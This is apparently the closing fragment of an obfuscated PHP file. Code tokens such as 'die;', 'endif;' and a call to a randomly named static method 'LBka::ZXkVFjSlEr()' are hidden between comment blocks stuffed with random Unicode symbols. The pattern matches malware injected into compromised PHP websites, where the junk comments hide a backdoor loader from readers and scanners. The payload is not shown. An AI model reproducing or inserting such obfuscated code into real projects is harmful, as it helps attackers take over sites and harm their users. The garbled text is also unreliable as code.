,hnRh{v❦「❈╔ⓚ┽↼㊋㈤㊌⋡⋒ℴ㊖▷⇊⑫✢⊄⋟≚≖↚↘◠┪♙ⓒ﹛@☣
-*///
);/*-2tD{-*///
/*-c#zVl;B:o?-*///
die;/*-


〈✐╒⒪ℑ㈠﹟✔⒗㊖↜﹜⏎Ⓟ➩》⊩┩Ⓢ


1v〈✐╒⒪ℑ㈠﹟✔⒗㊖↜﹜⏎Ⓟ➩》⊩┩Ⓢ


-*///
 endif;/*-{M^+_-*///
 }/*-
∔∳⋰╫☏⒯⒃⋦◽▸┣⒠^
)3?∔∳⋰╫☏⒯⒃⋦◽▸┣⒠^
-*///
}/*-


⊘⋐▋≖◿╜☼❀⊽➅▌┛▦┆➯⏥⒨≄ⅼ⇪¿ℐ㊂㊛█⊃⑧⒈╫➳⋴


9>H[⊘⋐▋≖◿╜☼❀⊽➅▌┛▦┆➯⏥⒨≄ⅼ⇪¿ℐ㊂㊛█⊃⑧⒈╫➳⋴


-*///
LBka/*-

ⓙ☂▐↉㊡➥ﭢℑ⒰≊∯✧Ⅾ✜Ⓔ┕⌒

b^iIfⓙ☂▐↉㊡➥ﭢℑ⒰≊∯✧Ⅾ✜Ⓔ┕⌒

-*///
::/*-}d-*///
ZXkVFjSlEr/*-
↭▃✴↾♀➽⋔┊ℴ웃⋑∼ⓔ⊊✭⇐♝✚≕⋚◾
l+D↭▃✴↾♀➽⋔┊ℴ웃⋑∼ⓔ⊊✭⇐♝✚≕⋚◾
-*///
();/*-kb>}od-*///
 ?>